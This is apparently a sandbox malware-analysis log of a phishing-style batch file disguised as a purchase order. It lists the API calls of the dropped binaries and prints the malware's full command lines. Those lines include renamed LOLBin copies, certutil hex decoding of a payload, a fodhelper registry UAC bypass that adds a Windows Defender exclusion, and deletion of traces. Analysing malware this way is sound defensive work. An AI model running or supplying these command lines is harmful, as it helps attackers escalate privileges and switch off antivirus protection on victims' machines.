                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF119F8 #359,FindFirstFileW,FindNextFileW,FindClose,25_2_00007FF67DF119F8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBDBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,25_2_00007FF67DEBDBC0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF11B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,25_2_00007FF67DF11B04
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEF3674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,25_2_00007FF67DEF3674
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBD4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,25_2_00007FF67DEBD4A4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE7D440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,25_2_00007FF67DE7D440
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBB3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,25_2_00007FF67DEBB3D8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF16F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,25_2_00007FF67DF16F80
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF110C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,25_2_00007FF67DF110C4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF13100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,25_2_00007FF67DF13100
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEAC6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,25_2_00007FF67DEAC6F8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF1234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,25_2_00007FF67DF1234C
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1B9FBB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,28_2_1B9FBB30
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1B9FC34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,28_2_1B9FC34D
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA0C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,28_2_1BA0C291
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA09AF5 FindFirstFileW,28_2_1BA09AF5
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1B9F880C FindFirstFileW,FindNextFileW,FindClose,28_2_1B9F880C
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1B9F783C FindFirstFileW,FindNextFileW,28_2_1B9F783C
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1B9F9665 FindFirstFileW,FindNextFileW,FindClose,FindClose,28_2_1B9F9665
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1B9FBD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,28_2_1B9FBD37
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA3E879 FindFirstFileExA,28_2_1BA3E879
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BD823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,29_2_00007FF789BD823C
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BD2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,29_2_00007FF789BD2978
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BC35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,29_2_00007FF789BC35B8
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BC1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,29_2_00007FF789BC1560
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BE7B4C FindFirstFileW,FindNextFileW,FindClose,29_2_00007FF789BE7B4C
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_029A5878 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,36_2_029A5878
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_2106C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,36_2_2106C34D
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_21069253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,36_2_21069253
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_2107C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,36_2_2107C291
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_21069665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,36_2_21069665
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_2106880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,36_2_2106880C
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_2106783C FindFirstFileW,FindNextFileW,36_2_2106783C
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_210AE879 FindFirstFileExA,36_2_210AE879
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_2106BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,36_2_2106BB30
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_21079AF5 FindFirstFileW,FindNextFileW,FindNextFileW,36_2_21079AF5
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_2106BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,36_2_2106BD37
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_21067C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,36_2_21067C97
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEF511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree,25_2_00007FF67DEF511C
                    Source: C:\Users\Public\xkn.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\Public\xkn.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: Kpeyvroh.PIF, 00000026.00000002.2504569132.0000000000652000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZ
                    Source: Kpeyvroh.PIF, 00000024.00000002.2419249499.000000000071E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQ
                    Source: xkn.exe, 00000009.00000002.2186803766.0000015A4B040000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                    Source: sppsvc.pif, 0000001C.00000003.3094405950.0000000000796000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3094405950.0000000000781000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: xkn.exe, 00000009.00000002.2186803766.0000015A4B040000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}R
                    Source: C:\Users\Public\Libraries\sppsvc.pifAPI call chain: ExitProcess graph end node
                    Source: C:\Users\Public\Libraries\sppsvc.pifAPI call chain: ExitProcess graph end node
                    Source: C:\Users\Public\Libraries\sppsvc.pifAPI call chain: ExitProcess graph end node
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFAPI call chain: ExitProcess graph end node
                    Source: C:\Users\Public\xkn.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BE63FC GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,4_2_00007FF789BE63FC
                    Source: C:\Users\Public\ger.exeCode function: 14_2_00007FF65588A29C memset,SearchPathW,CreateFileW,GetFileSize,ReadFile,SetFilePointer,CharNextW,IsCharAlphaNumericW,StrToIntW,IsCharAlphaNumericW,StrToIntW,CharNextW,GetLastError,OutputDebugStringW,CloseHandle,14_2_00007FF65588A29C
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1B9F6A63 LoadLibraryA,GetProcAddress,28_2_1B9F6A63
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA332B5 mov eax, dword ptr fs:[00000030h]28_2_1BA332B5
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_210A32B5 mov eax, dword ptr fs:[00000030h]36_2_210A32B5
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_029E53AD mov eax, dword ptr fs:[00000030h]36_2_029E53AD
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BD823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,4_2_00007FF789BD823C
                    Source: C:\Users\Public\xkn.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BD8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FF789BD8FA4
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BD93B0 SetUnhandledExceptionFilter,4_2_00007FF789BD93B0
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BD8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00007FF789BD8FA4
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BD93B0 SetUnhandledExceptionFilter,6_2_00007FF789BD93B0
                    Source: C:\Users\Public\ger.exeCode function: 14_2_00007FF65588ED50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_00007FF65588ED50
                    Source: C:\Users\Public\ger.exeCode function: 14_2_00007FF65588F050 SetUnhandledExceptionFilter,14_2_00007FF65588F050
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF453E0 SetUnhandledExceptionFilter,25_2_00007FF67DF453E0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF44E18 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,25_2_00007FF67DF44E18
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA2BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_1BA2BB22
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA24B47 SetUnhandledExceptionFilter,28_2_1BA24B47
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA249F8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_1BA249F8
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA249F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_1BA249F9
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA24FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_1BA24FDC
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BD8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,29_2_00007FF789BD8FA4
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BD93B0 SetUnhandledExceptionFilter,29_2_00007FF789BD93B0
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_210949F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,36_2_210949F9
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_2109BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,36_2_2109BB22
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_21094B47 SetUnhandledExceptionFilter,36_2_21094B47
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_21094FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,36_2_21094FDC
                    Source: C:\Users\Public\xkn.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
                    Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
                    Source: C:\Users\Public\xkn.exeProcess created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
                    Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe " Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe " Jump to behavior
                    Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe " Jump to behavior
                    Source: C:\Users\Public\xkn.exeProcess created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "Jump to behavior
                    Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "Jump to behavior
                    Drops or copies certutil.exe with a different name (likely to bypass HIPS)
                    Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file
                    Drops or copies cmd.exe with a different name (likely to bypass HIPS)
                    Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe36_2_210720F7
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEF7024 GetModuleHandleW,GetProcAddress,#356,#357,CloseHandle,LocalFree,LocalFree,LocalFree,ImpersonateLoggedOnUser,#356,EqualSid,#357,LogonUserExW,GetLastError,ImpersonateLoggedOnUser,#356,#359,RevertToSelf,#356,25_2_00007FF67DEF7024
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA09627 mouse_event,28_2_1BA09627
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exeJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exeJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe C:\\Users\\Public\\ger.exeJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe " Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9 Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12 Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Libraries\sppsvc.pif C:\Users\Public\Libraries\sppsvc.pifJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del "C:\Users\Public\sppsvc.rtf" / A / F / Q / S Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del "C:\Users\Public\ger.exe" / A / F / Q / S Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe " Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S Jump to behavior
                    Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exeJump to behavior
                    Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\reg.exe C:\\Users\\Public\\ger.exeJump to behavior
                    Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe " Jump to behavior
                    Source: C:\Users\Public\xkn.exeProcess created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "Jump to behavior
                    Source: C:\Users\Public\xkn.exeProcess created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe" Jump to behavior
                    Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "Jump to behavior
                    Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
                    Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9
                    Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
                    Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe
                    Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe c:\\users\\public\\alpha /c c:\\users\\public\\xkn.exe -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn.exe -windowstyle hidden -command "add-mppreference -exclusionpath c:\users "' ; start fodhelper.exe "
                    Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\xkn.exe c:\\users\\public\\xkn.exe -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn.exe -windowstyle hidden -command "add-mppreference -exclusionpath c:\users "' ; start fodhelper.exe "
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe c:\\users\\public\\alpha /c c:\\users\\public\\xkn.exe -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn.exe -windowstyle hidden -command "add-mppreference -exclusionpath c:\users "' ; start fodhelper.exe " Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\xkn.exe c:\\users\\public\\xkn.exe -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn.exe -windowstyle hidden -command "add-mppreference -exclusionpath c:\users "' ; start fodhelper.exe " Jump to behavior
                    Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\xkn.exe c:\\users\\public\\xkn.exe -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn.exe -windowstyle hidden -command "add-mppreference -exclusionpath c:\users "' ; start fodhelper.exe " Jump to behavior
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF272B0 CAFindByName,#359,LocalAlloc,InitializeSecurityDescriptor,GetLastError,SetSecurityDescriptorDacl,GetLastError,GetSecurityDescriptorLength,LocalAlloc,MakeSelfRelativeSD,GetLastError,CASetCASecurity,CAUpdateCAEx,#357,LocalFree,LocalFree,LocalFree,CACloseCA,25_2_00007FF67DF272B0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEF4E98 AllocateAndInitializeSid,GetLastError,#357,GetCurrentThread,GetLastError,OpenThreadToken,GetLastError,GetCurrentProcess,GetLastError,OpenProcessToken,GetLastError,DuplicateToken,GetLastError,CheckTokenMembership,GetLastError,CloseHandle,CloseHandle,FreeSid,25_2_00007FF67DEF4E98
                    Source: sppsvc.pif, 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerQD\85q3
                    Source: sppsvc.pif, 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerQD\T3
                    Source: sppsvc.pif, 0000001C.00000002.4503603032.000000000083C000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3094405950.0000000000781000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4501499692.0000000000781000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
